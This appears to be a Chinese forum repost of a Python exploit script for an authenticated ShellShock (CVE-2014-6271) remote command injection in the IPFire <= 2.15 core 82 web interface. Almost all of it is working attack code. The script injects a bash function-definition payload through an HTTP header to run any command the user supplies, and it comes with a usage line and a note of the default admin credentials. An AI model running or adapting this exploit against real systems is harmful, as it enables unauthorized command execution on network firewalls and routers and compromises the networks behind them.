IPFire Cgi Web界面验证Bash漏洞

admin

利用方法：

1. ipfire_cgi_shellshock.py -t https://target:444/ -u admin -p pwd -c "touch /tmp/test.txt"

复制代码

exp:

1. #!/usr/bin/env python
   
2. #
   
3. # Exploit Title : IPFire <= 2.15 core 82 Authenticated cgi Remote Command Injection (ShellShock)
   
4. #
   
5. # Exploit Author : Claudio Viviani
   
6. #
   
7. # Vendor Homepage : [url]http://www.ipfire.org[/url]
   
8. #
   
9. # Software Link: [url]http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso[/url]
   
10. #
    
11. # Date : 2014-09-29
    
12. #
    
13. # Fixed version: IPFire 2.15 core 83 (2014-09-28)
    
14. #
    
15. # Info: IPFire is a free Linux distribution which acts as a router and firewall in the first instance.
    
16. #       It can be maintained via a web interface.
    
17. #       The distribution furthermore offers selected server-daemons and can easily be expanded to a SOHO-server.
    
18. #       IPFire is based on Linux From Scratch and is, like the Endian Firewall, originally a fork from IPCop.
    
19. #
    
20. # Vulnerability: IPFire <= 2.15 core 82 Cgi Web Interface suffers from Authenticated Bash Environment Variable Code Injection
    
21. #                (CVE-2014-6271)
    
22. #
    
23. # Suggestion:
    
24. #
    
25. # If you can't update the distro and you have installed ipfire via image files (Arm, Flash)
    
26. # make sure to change the default access permission to graphical user interface (user:admin pass:ipfire)
    
27. #
    
28. #
    
29. # http connection
    
30. import urllib2
    
31. # Basic Auth management Base64
    
32. import base64
    
33. # Args management
    
34. import optparse
    
35. # Error management
    
36. import sys
    
37. 
    
38. banner = """
    
39.        ___ _______ _______ __                _______       __
    
40.       |   |   _   |   _   |__.----.-----.   |   _   .-----|__|
    
41.       |.  |.  1   |.  1___|  |   _|  -__|   |.  1___|  _  |  |
    
42.       |.  |.  ____|.  __) |__|__| |_____|   |.  |___|___  |__|
    
43.       |:  |:  |   |:  |                     |:  1   |_____|
    
44.       |::.|::.|   |::.|                     |::.. . |
    
45.       `---`---'   `---'                     `-------'
    
46.    _______ __          __ __ _______ __               __
    
47.   |   _   |  |--.-----|  |  |   _   |  |--.-----.----|  |--.
    
48.   |   1___|     |  -__|  |  |   1___|     |  _  |  __|    <
    
49.   |____   |__|__|_____|__|__|____   |__|__|_____|____|__|__|
    
50.   |:  1   |                 |:  1   |
    
51.   |::.. . |                 |::.. . |
    
52.   `-------'                 `-------'
    
53. 
    
54.                                 IPFire <= 2.15 c0re 82 Authenticated
    
55.                                 Cgi Sh3llSh0ck r3m0t3 C0mm4nd Inj3ct10n
    
56. 
    
57.                           Written by:
    
58. 
    
59.                         Claudio Viviani
    
60. 
    
61.                      [url]http://www.homelab.it[/url]
    
62. 
    
63.                         [email]info@homelab.it[/email]
    
64.                     [email]homelabit@protonmail.ch[/email]
    
65. 
    
66.                [url]https://www.facebook.com/homelabit[/url]
    
67.                   [url]https://twitter.com/homelabit[/url]
    
68.                [url]https://plus.google.com/+HomelabIt1/[/url]
    
69.      [url]https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww[/url]
    
70. """
    
71. 
    
72. # Check url
    
73. def checkurl(url):
    
74.     if url[:8] != "https://" and url[:7] != "http://":
    
75.         print('[X] You must insert http:// or https:// procotol')
    
76.         sys.exit(1)
    
77.     else:
    
78.         return url
    
79. 
    
80. def connectionScan(url,user,pwd,cmd):
    
81.     print '[+] Connection in progress...'
    
82.     try:
    
83.         response = urllib2.Request(url)
    
84.         content = urllib2.urlopen(response)
    
85.         print '[X] IPFire Basic Authentication not found'
    
86.     except urllib2.HTTPError, e:
    
87.         if e.code == 404:
    
88.             print '[X] Page not found'
    
89.         elif e.code == 401:
    
90.             try:
    
91.                 print '[+] Authentication in progress...'
    
92.                 base64string = base64.encodestring('%s:%s' % (user, pwd)).replace('\n', '')
    
93.                 headers = {'VULN' : '() { :;}; echo "H0m3l4b1t"; /bin/bash -c "'+cmd+'"' }
    
94.                 response = urllib2.Request(url, None, headers)
    
95.                 response.add_header("Authorization", "Basic %s" % base64string)
    
96.                 content = urllib2.urlopen(response).read()
    
97.                 if "ipfire" in content:
    
98.                     print '[+] Username & Password: OK'
    
99.                     print '[+] Checking for vulnerability...'
    
100.                     if 'H0m3l4b1t' in  content:
     
101.                         print '[!] Command "'+cmd+'": INJECTED!'
     
102.                     else:
     
103.                         print '[X] Not Vulnerable :('
     
104.                 else:
     
105.                      print '[X] No IPFire page found'
     
106.             except urllib2.HTTPError, e:
     
107.                 if e.code == 401:
     
108.                    print '[X] Wrong username or password'
     
109.                 else:
     
110.                    print '[X] HTTP Error: '+str(e.code)
     
111.             except urllib2.URLError:
     
112.                 print '[X] Connection Error'
     
113.         else:
     
114.             print '[X] HTTP Error: '+str(e.code)
     
115.     except urllib2.URLError:
     
116.         print '[X] Connection Error'
     
117. 
     
118. commandList = optparse.OptionParser('usage: %prog -t https://target:444/ -u admin -p pwd -c "touch /tmp/test.txt"')
     
119. commandList.add_option('-t', '--target', action="store",
     
120.                   help="Insert TARGET URL",
     
121.                   )
     
122. commandList.add_option('-c', '--cmd', action="store",
     
123.                   help="Insert command name",
     
124.                   )
     
125. commandList.add_option('-u', '--user', action="store",
     
126.                   help="Insert username",
     
127.                   )
     
128. commandList.add_option('-p', '--pwd', action="store",
     
129.                   help="Insert password",
     
130.                   )
     
131. options, remainder = commandList.parse_args()
     
132. 
     
133. # Check args
     
134. if not options.target or not options.cmd or not options.user or not options.pwd:
     
135.     print(banner)
     
136.     commandList.print_help()
     
137.     sys.exit(1)
     
138. 
     
139. print(banner)
     
140. 
     
141. url = checkurl(options.target)
     
142. cmd = options.cmd
     
143. user = options.user
     
144. pwd = options.pwd
     
145. 
     
146. connectionScan(url,user,pwd,cmd)

复制代码